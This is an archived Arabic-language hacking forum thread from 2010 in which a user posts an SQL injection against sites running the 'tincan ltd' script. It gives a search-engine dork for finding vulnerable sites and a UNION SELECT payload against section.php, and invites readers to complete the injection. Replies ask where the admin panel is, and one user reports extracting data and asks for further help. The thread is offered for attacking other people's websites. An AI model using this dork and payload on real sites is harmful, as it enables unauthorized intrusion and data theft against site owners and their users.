:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   ثغرة في سكريبت tincan ltd (http://www.vbspiders.com/vb/t23707.html)

M!M0 01-12-2010 07:37 PM
ثغرة في سكريبت tincan ltd
 
السلام عليكم ورحمة الله وبركاته

جبت لكم اليوم ثغرة في سكريبت tincan ltd

الثغرة من نوع SQL INJECTION

الذي يعشقها الكثير

نبدأ

دورك البحث عن المواقع المصابة

كود PHP:
DorK intext:'powered by tincan ltd' and  inurl:"section.php?section=9" 
طريقة الإستغلال

كود PHP:
http://server/section.php?section=9&topic=6+union+select+1,2,3,version(),5-- 
ذي المرة أنتم أكملو الحقن بأنفسكم




الثغرة من إكتشاف

altbta

MouDaMiR 01-12-2010 09:55 PM
اين هي لوحة admin

KaLa$nikoV 01-12-2010 10:03 PM
شكرا لك كثيرا ع الثغره


لو كان في لوحه ادمن كان افضل :)


يلا ع كل حال مشكور

M!M0 01-12-2010 10:12 PM
مشكووورين على المرور

نعم لو كانت معها لوحة التحكم أفضل

MouDaMiR 01-12-2010 10:15 PM
لاني استخرجت المعلومات لكن بدون فايدةة...المرجوا من اصخاب الخبر المساعد..و شكرااا


الساعة الآن 12:08 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0